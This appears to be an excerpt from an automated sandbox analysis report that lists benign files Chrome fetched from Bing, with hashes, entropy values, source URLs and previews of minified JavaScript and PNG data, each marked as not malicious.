                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1039
                                                                                                      Entropy (8bit):5.394520629964255
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                                                      MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                                                      SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                                                      SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                                                      SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/lHJQIO-n0-6PrtK33_xaQQY2O14.js
                                                                                                      Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65188)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):77391
                                                                                                      Entropy (8bit):5.274343929479743
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:986uWt+5MaZ+sefChTFh7g58k0D5ChKt/w976PZM+dfWXNWfGh22m9oCcQhS9Chx:W6uWy/fW8k0kcPySW9mFbiIZ
                                                                                                      MD5:13B147A683AF38608F9C22EE9D66A832
                                                                                                      SHA1:F9291CD3A214674A186F4BE85CDC655A6B3A31FA
                                                                                                      SHA-256:F0B2216568BB538A00EE14C13AD49EA15B1653044A219A698889610EDCF9BF05
                                                                                                      SHA-512:1C4DEB1CF689906DD026C6FE7383CFAC8F1BEABAC05DC65309A35F60CB70EBED45D265351B8B6D35382C5136815E0809772A48E242608E309BECB9B7078CAB17
                                                                                                      Malicious:false
                                                                                                      Preview:/**.* -------------------------------------------------------------------------------------------.* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License..* See License in the project root for license information..* -------------------------------------------------------------------------------------------.*/.var MicrosoftGraph=function(e){"use strict";function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}function n(e){var t=function(e,t){if("object"!==r(e)||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var i=n.call(e,t||"default");if("object"!==r(i))return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"st
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 60 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1045
                                                                                                      Entropy (8bit):7.812007487462295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2YvL3J/eQWCXbwIoGryAFXt3jwRDa9W3TH:Rv1NHUIbrzU3TH
                                                                                                      MD5:2AA8CAB3D7B05D1540A69E6DA11C916B
                                                                                                      SHA1:4F7B7A5776B3806E0195245C82E476B2CB943B14
                                                                                                      SHA-256:BE40B55ED2C02CA68A1527E8B50CB949FFF17EC444504F9ABCE98C97EBAD1738
                                                                                                      SHA-512:FEC6CD89DA1CC4630A229567101F83D979860F6CDF34FEA00174052FDEE93F00F8F0AA489C565F6CD1BCEE3124DFCB1DCE9418FBA7B3983EF6F6946C8689B241
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR...<.........=P.D....IDATx..?LSA.......J(......YcY\.......%&n.XD....X...N..Q...US.IL...z.?.?.}..I.......~w....Jv..Q..........8M...6..%..X.u....\.f.X..>u.d..E.+b6.P4.].........W.}t..jc......^.....p.).".U.H...y...i...Fz......a`.,Gr.8XP.K3@./.U...+........d`.;...,...{.U.s.:...<O......~..'.8#{...5....9...../."S.....9...Nr<=.u57.?G.a.x......}.....6n=W.3}...(.QV....y..R..G`.J...5....h.R.Z).:8.../5.%&..9..M...jQ.V?..[-E...........-....1.[!....)Ml].i.I. 8.).A.aiE./0.C'.P...v.....e(.....;...E...i..D....ea.#.3)..h..&,...Y..$-G......G...IY..T...mP.5?l...5w..t....m.O6........o(...f.k..Q5.....A.....S.......s.D..R.....^..{o..~..a...X....Z.I..Z.*/m...$....\..2O.$%.3;....)..m...}h.l....&.OPq.k......T.:q.E.p"".....{V.$/4a9.G.4.E..1..{... Y.....:3.9.&m..Z...k.'........v.\.e...y+.L..%..{..8..E..R&....[I.P......0.u/#.......f......e....H'.v..qp..J.w..}e.*.,..@....7Sjd.$aW......o.'R...L.#...0....K..rT`>>......Y2..,...!.......T
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (812), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):812
                                                                                                      Entropy (8bit):4.986458196577728
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5HBnpbUAVNCUfT5eTmiHFmCvHFs9CFH/Ev18dRokVHd:5dRjKhSirOc1/k13y
                                                                                                      MD5:6A6A1291533F6BA2D08800CDE3D936C3
                                                                                                      SHA1:634EC182826760B335E20CB5EC466F3728F57775
                                                                                                      SHA-256:8C038777AA2043D5AA55680ABB118CF9A266D7B059F242589A6300F83C4BD179
                                                                                                      SHA-512:992BF911B3EDD7C630018954F94B28950B574C004F82F30332DB38D5172DD996E5A63645203DC42665990351AEC61086FDFB188248AAD1771C2A830BDB882076
                                                                                                      Malicious:false
                                                                                                      Preview:var HoverZoomin;(function(n){function f(n,t){var r=document.querySelectorAll(n),u,i;if(r)for(u=function(n){var i=r[n],u;if(!i)return"continue";u=t?i.querySelectorAll(t):null;sj_be(i,"mouseenter",function(){return e(i,u)});sj_be(i,"mouseleave",function(){return o(i,u)})},i=0;i<r.length;i++)u(i)}function e(n,f){t===undefined&&(r(),t=setInterval(function(){var e=s(.1*i,1,u),t,o;if(f)for(t=0;t<f.length;t++)o=f[t],o&&(o.style.transform="scale(".concat(e,")"));else n.style.transform="scale(".concat(e,")");i++;e>=u&&r()},1e3/30))}function o(n,t){var i,u;if(r(),t)for(i=0;i<t.length;i++)u=t[i],u&&(u.style.transform="");else n.style.transform=""}function s(n,t,i){return t+(.5-Math.cos(n*Math.PI)/2)*(i-t)}function r(){clearInterval(t);t=undefined;i=1}var t,i=1,u=1.1;n.bindHover=f})(HoverZoomin||(HoverZoomin={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (4972), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):4972
                                                                                                      Entropy (8bit):5.375879110370942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:in5ZmrbQ9qs1EYyLyhjOreag9n9wwFvtY4keJrSzyXCrut5zlD:in5ZmXQgs1EYyetOEp9ZFvVk6ByrutVd
                                                                                                      MD5:43B58B6B14B60581457EF8A405721626
                                                                                                      SHA1:FA9DA729B92847CC05AD81625B5667F299B75C08
                                                                                                      SHA-256:CEF3B449403A4725A3866768F730E13F1BDDEC067CC67F306F023DE2815A2789
                                                                                                      SHA-512:4C22EC83B8A81E0716C4EA9C643CFB4C4F9256447A114B7B0E05C0B38BC073F4A0538E2A385E963B3E2634EF34F66050AC2C36801772A345670409BE8FD2E829
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/-p2nKbkoR8wFrYFiW1Zn8pm3XAg.js
                                                                                                      Preview:(function(){function u(n){var e=fab_config&&fab_config.fabSbActionHover,o=fab_config&&fab_config.FabAddSuggestions,u,r,f,i;if(_w.sj_log&&sj_log("CI.Fab","hover","1"),e==="Expand")if(t||fab_config.fabSbActionData!=="AutoSuggest"){if(t||fab_config.fabSbActionData!=="RelatedSearch")o&&document.getElementsByClassName("b_fabHide").length===0?(t.style.display="flex",sb_st(function(){t.style.transform="scaleX(1)"},50)):t.style.transform==="scaleX(0)"&&document.getElementsByClassName("b_fabHide").length===0&&(t.style.display="flex",sb_st(function(){t.style.transform="scaleX(1)"},50));else if(_w.sj_log&&sj_log("CI.FabRS","hover","1"),u=_d.getElementsByClassName("b_rs"),u.length>0){for(r=u[0].getElementsByTagName("a"),f=[],i=0;i<r.length;i++)f.push({html:r[i].innerHTML,url:r[i].getAttribute("href"),src:"RS"});v(f)}}else{_w.sj_log&&sj_log("CI.FabAS","hover","1");var s=typeof URLSearchParams=="undefined"?d("q"):new URLSearchParams(_w.location.search).get("q"),l="&mkt="+_G.Mkt,h="&query="+s,c="as/a
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (924), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):924
                                                                                                      Entropy (8bit):5.195012633286773
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                                                      MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                                                      SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                                                      SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                                                      SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                                                      Malicious:false
                                                                                                      Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):374789
                                                                                                      Entropy (8bit):5.15863921127451
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:1irrzbB3LH7gaV6Z8LAfP0Rp6Izc04YFdNwRm2EjXi4SG7oIBYQmzec:aHNfi4KwYQmzec
                                                                                                      MD5:E6940BDA64389C1FA2AE8E1727ABE131
                                                                                                      SHA1:1568647E5ACD7835321D847024DF3FFDF629E547
                                                                                                      SHA-256:EEF5DD06CF622FB43EA42872BC616D956DE98A3335861AF84D35DBAF2AB32699
                                                                                                      SHA-512:91C07E84E5188336464AE9939BFC974D26B0C55D19542527BDCD3E9CAC56D8C07655DC921ACAA487ED993977A22A0F128DC3C6111273273FF1F637B20BB56FB6
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/FWhkflrNeDUyHYRwJN8__fYp5Uc.js
                                                                                                      Preview:(function(n){function t(r){if(i[r])return i[r].exports;var u=i[r]={i:r,l:!1,exports:{}};return n[r].call(u.exports,u,u.exports,t),u.l=!0,u.exports}var i={};return t.m=n,t.c=i,t.d=function(n,i,r){t.o(n,i)||Object.defineProperty(n,i,{enumerable:!0,get:r})},t.r=function(n){typeof Symbol!="undefined"&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"});Object.defineProperty(n,"__esModule",{value:!0})},t.t=function(n,i){var r,u;if((i&1&&(n=t(n)),i&8)||i&4&&typeof n=="object"&&n&&n.__esModule)return n;if(r=Object.create(null),t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:n}),i&2&&typeof n!="string")for(u in n)t.d(r,u,function(t){return n[t]}.bind(null,u));return r},t.n=function(n){var i=n&&n.__esModule?function(){return n["default"]}:function(){return n};return t.d(i,"a",i),i},t.o=function(n,t){return Object.prototype.hasOwnProperty.call(n,t)},t.p="",t(t.s=0)})([function(n,t,i){window.SpeechSDK=i(1)},function(n,t,i){"use strict";function r(n){for(
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):102727
                                                                                                      Entropy (8bit):5.3090981493103016
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:j2cqCv9YKcgfYpi2agfBtXykUUFDgXfynmbrf1xusT:j2CV7cgU+g5Udv1Huc
                                                                                                      MD5:D5B84A6628412CF81E7245D5BFCBD3CC
                                                                                                      SHA1:8256EEE1DCCCD4715F2827D9DE3F08C949D205AD
                                                                                                      SHA-256:E1BE65D5511C774311F4370F4A9DC2CCD445F90F2338E64F923D76DDB93C5467
                                                                                                      SHA-512:8E12FEF1199374512E4A3B09BB59C8007115316DDA58F26C7110218D59476B606BEB1E423901A472E41F388CBA0A2D09D2D0EEA1DA37EBDCB5F821F766A3F598
                                                                                                      Malicious:false
                                                                                                      Preview:var AutoSuggest,sa_storage,EventKeyCodes,__extends,Bing,sa_inst;(function(n){var t;(function(n){var t,i,r,u,f,e;(function(n){n.User="SRCHHPGUSR"})(t=n.CookieNames||(n.CookieNames={})),function(n){n.AutoSuggest="AS"}(i=n.CrumbNames||(n.CrumbNames={})),function(n){n.CursorPosition="cp";n.ConversationId="cvid";n.SuggestionCount="sc";n.PartialQuery="pq";n.SuggestionPosition="sp";n.SuggestionType="qs";n.PreviewPaneSuggestionType="qsc";n.SkipValue="sk";n.PreviewPaneSkipValue="skc";n.Ghosting="ghc";n.Css="css";n.Count="count";n.DataSet="ds";n.SessionId="sid";n.TimeStamp="qt";n.Query="q";n.ImpressionGuid="ig";n.QFQuery="qry";n.BaseQuery="bq";n.FormCode="form";n.HashedMuid="nclid";n.RequestElToken="elvr";n.ElTokenValue="elv";n.AppId="appid";n.History="history";n.NoHistory="nohs";n.ApiTextDecoration="textdecorations";n.ClientId="clientid";n.Market="mkt";n.Scope="scope";n.CountryCode="cc";n.HomeGeographicRegion="hgr";n.SetLang="setlang";n.ZeroInputSerp="zis";n.GhShown="ghsh";n.GhAccepted="ghacc";
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (891), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):891
                                                                                                      Entropy (8bit):5.1332488883366585
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                                                      MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                                                      SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                                                      SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                                                      SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/hoJZx9xRdanMHi7INfPZtL0_VnM.js
                                                                                                      Preview:(function(){function e(){var t,r;n&&(n.value.length>0?(t=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||t===void 0?void 0:t.add(sj_b,i):(r=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||r===void 0?void 0:r.remove(sj_b,i))}function o(t){var e,o;n.value="";n.innerText="";u&&f&&(u.innerText="",f.classList.remove("nudgeVisible"));(e=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||e===void 0?void 0:e.remove(sj_b,i);sj_log("CI.XButton","Clicked","1");r&&((o=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||o===void 0?void 0:o.add(r,"b_focus"));n.focus();n.click();t&&(t.preventDefault(),t.stopPropagation())}var r=_ge("b_header"),n=_ge("sb_form_q"),t=_ge("sb_clt"),u=_qs(".qfc.b_searchbox .ghost"),f=_qs(".qfc.b_searchbox .nudge"),i="b_sbText";n&&t&&(sj_be(t,"click",o),sj_be(t,"keydown",function(n){var t=n.code||n.key;t==="Enter"&&o(n)}),sj_be(n,"keyup",e),e())})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2683
                                                                                                      Entropy (8bit):5.285209446790883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                                                      MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                                                      SHA1:394194F8DD058927314D41E065961B476084F724
                                                                                                      SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                                                      SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/OUGU-N0FiScxTUHgZZYbR2CE9yQ.js
                                                                                                      Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1490
                                                                                                      Entropy (8bit):7.80890750809164
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:QoQSiZ8RVtivs4fDzVoQ6OBot1FtATzEGuG9AD8Z6zdNyLWjOgR891Snff:/wWMvsCVoVt1FUzqG9tEXyyZRuSnff
                                                                                                      MD5:46DBCA792179852611800CFB80AA8CF3
                                                                                                      SHA1:23F08454053EC2D68BA941483CB4A96C2410B268
                                                                                                      SHA-256:16F9EE9E7123AF42BEA111133493B0328250421D2455758441D4C7089C410C0E
                                                                                                      SHA-512:55D84EA1B267C02B920249D68B3D2710E2AB38782689FB43E1F2617BA3D4D41E6C07C8540944A343E5A75B26F587937997A9C2E7F00EC253802C310E9A636EA1
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....tIDATXG.V}PTU...Tj...445..]!Hv.%0g.Q+'5.2.G..J..D.d...qR....C!.MQ..(JCf.Q*?2.P>........oy.......;..s~..s.=R...}.d1.)HQ.d.....(....,Y.R.i........d...-J...x..*...%..@..(Nv)..P.?..AA....[iO.~:...R...._..{qk.{.T....b....%`n5]P..M..M..T...T..PO..^._.]........+..s.....%S)Y.....-..*.Xq......r..h....I.Z.&..w.G.."....u4'zY.....UD.E.r.|..V:UV.....<B...:....Tp..mSs...1.bL...<.D4.L.1H...&"xE..j.....u....|.n..z.......^.1...@.)...XygW'.......yk"....[/..Bp.D...!...O.l.s.gL.}...}....:...(.r:...H..e.........*8..;........6Eg....j. .v.I..Z.S3..j.`.}...a....1#....j.c...E...CL..'%.O..8{.s\5.!.....{+{.7....N.u>.. ...T8......P.n.s...|.<....?].c.!....A....... ..j.B%.8~.MY....v.}Zp....<;e...`.t....\..}...zi.Th..[].J........ZZhsZ..]....d..|40..>;t.u....U.....45An...8..U^.]7Y.#..z...........`....o..G....5........%...c.....K.~+G`.d..-....K...`.........E..x:8..1r.u..'.5..?..CcV.0tF...>.Z.....
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (357), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):357
                                                                                                      Entropy (8bit):5.100320804030099
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8Ed7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mqJFO:2QVlY8EbgRUGhS+eTKb2PVESq8qrO
                                                                                                      MD5:2DF9793CF020A37C88178BE84311427A
                                                                                                      SHA1:29CFE86239722D4F4AF07C494D676092896A8600
                                                                                                      SHA-256:A69D257EEE41E843881D548D2E4EE5A0727B889AB22BFFDAA8ED1074E802BCC6
                                                                                                      SHA-512:E9A35EC1E466FEB3E273FB991A3282BA1C45FD0EACEA956E9821914CC4261377684B062BDE888EBF5767BBC055DB191DC14E00AF8037B5607449C06E5D2DD082
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/Kc_oYjlyLU9K8HxJTWdgkolqhgA.js
                                                                                                      Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1392
                                                                                                      Entropy (8bit):7.796320976198958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zq00gh1w5R9UprEcf8jNNRwGEjJxSxcwV4/sukfm6OgRatsqDq0gcd6SUM:zqzm1wJqSLRwjjexjysukKsqDEc8m
                                                                                                      MD5:C5350436C66BC4E4C10F70BAF13DC4CA
                                                                                                      SHA1:0E77A216A7CFE0A335A1D9B5B30436CD9F9C1EC3
                                                                                                      SHA-256:A1664675270300CFAE5417D39B21CDF7005A6200BDA135CA8F978620FBBE93CD
                                                                                                      SHA-512:8798F8C560B43ECCE6E1B5406A5366E2F8DB46FDB34AADCD6A5D7566CD0F4BFA53695393874BC1381D8C57B4AE103A99362E3AB1DB29A3A05C7ABC7CBC9229F6
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.0487136c-9717-4c2c-acde-9914f4282920&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.VKl.U.}v.6........DP.."....hf...qb.Om..*.....).....HQYWP(..4........I.I`..~.uI........V.....i.y.{.w,..H..}.T.........!ra..r."b.`TX3.a-b......Gi!z..]0~.Kb9.._...W.kW..A..1a....|PX...u.Dj..\..@.,.w#.".h.D....gb....w".^..9D..6....Q\..........K.6.....1o..0;.{....$?"....ZE..Q1p..^.....(..=.G...^..4..... ..<o...h........K.5.z....4.C.!..].;..*..A.....q....F.Z..U....1r.g........8.....^F. `.[.].hUP..?.^..k...R.....'p...K.N...H...J9.LZ...k.E..j.3.!.!.>.s|@.mE...=9L.~.;S.._.m.J..\j...B...6..F....V.hC...v......'.8..aL8.g..i.Zm_kSaw...}.,..eQ."g.iY2.w.L.w....._,.11.U)..........a*..1o.j...s.k.=W...i..EY.?.#.....w.k6....e..D.Y/b..mx......Vh77...7..1.t(Z..0...Z..a/..."`....n..<.R.....(.).S..h.p.%.yN.l .p.3...p...M.i.9{H.P...9..a..3.H.{L...A.4..ZK3.W..~\.=,.//.3X...>.Z.L%:...6........9.......v..8..Y..Y..X......."..`+...U{.|.....).bX.w}#..H...v.s.....Sp...!Y...=:...7..a.YR...i...c7..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (3010), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):3010
                                                                                                      Entropy (8bit):5.226871204129987
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:OyuzAwlEG4zh4q8m1FLP2OM+53rW2m7r1zSQh1jyaQ6wsDm:MQG4zhvLuOM+ZW/1rj7Q6wgm
                                                                                                      MD5:12AE5624BF6DE63E7F1A62704A827D3F
                                                                                                      SHA1:C35379FC87D455AB5F8AEED403F422A24BBAD194
                                                                                                      SHA-256:1FB3B58965BEBC71F24AF200D4B7BC53E576D00ACF519FB67FE3F3ABDEA0A543
                                                                                                      SHA-512:DA5F5485E1E0FEB2A9A9DA0EAA342EDAEEEFAF12CE4DCD50D0143BF476356CB171BD62CB33C58E6D9D492D67F281982A99FEF3BFD2EBB9E54CF9782F7B92C17B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/w1N5_IfUVatfiu7UA_Qioku60ZQ.js
                                                                                                      Preview:var Swipe;(function(n){function i(n){var i=null,e,r,u,f;return"touches"in n?(e=n,r=e.targetTouches,r&&r.length==1&&(i={pageX:r[0].pageX,pageY:r[0].pageY})):t?(u=n,i={pageX:u.clientX,pageY:u.clientY}):(f=n,i={pageX:f.pageX,pageY:f.pageY}),i!=null&&(i.pageY+=_w.pageYOffset),i}function r(n){var e="getSelection",f=_w[e]||_d[e],t="",i,r,o,u;return f?(i=f(),t+=f(),n&&t!==""&&i.getRangeAt&&(r=i.getRangeAt(0),o=r&&r.getClientRects&&r.getClientRects.length,o>0&&i.removeAllRanges())):_d.selection&&(u=_d.selection,t+=u.createRange().text,n&&t!==""&&u.empty&&u.empty()),!!t}function e(n){sj_pd(n);r(!0)}function o(n,e,o,s,h,c,l,a,v,y){var w,rt,ut,it;o===void 0&&(o=_d.body);s===void 0&&(s=50);h===void 0&&(h=function(){});c===void 0&&(c=function(){});l===void 0&&(l=function(){});a===void 0&&(a=!1);v===void 0&&(v=!1);y===void 0&&(y=2);y=Math.max(y,2);var p=new u,b=null,k="touchstart",d="touchmove",g="touchend",nt="touchout",tt=a||!f;"ontouchstart"in _d.documentElement?(k="touchstart",d="touchmove",g="t
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (2132)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2243
                                                                                                      Entropy (8bit):5.181185410088681
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tHcUAmPopXrdMmgV3OKLpfBaAwKFEZJBluYun8suoAu0:tHcUAmPMgFFfEOFEZJBlxw8sLA/
                                                                                                      MD5:D734969C602DF6E3DA18E2EF72863206
                                                                                                      SHA1:FF31ABC07BB5B67493AEE5F52DC2B04FF277594E
                                                                                                      SHA-256:60DE7CD3F0521BC2E0C558C5F75594E2D7CE7D5C673128DCA4D06B1C860B4E07
                                                                                                      SHA-512:7369BFA6D0D0ED029E3CA8A14B2728C3C68AA8E7FBFFBBC1FCDE4E961D5C3701368484EF56370AD094E58EADE8FB656EAB15C1A93C4451068568C29B7DB77953
                                                                                                      Malicious:false
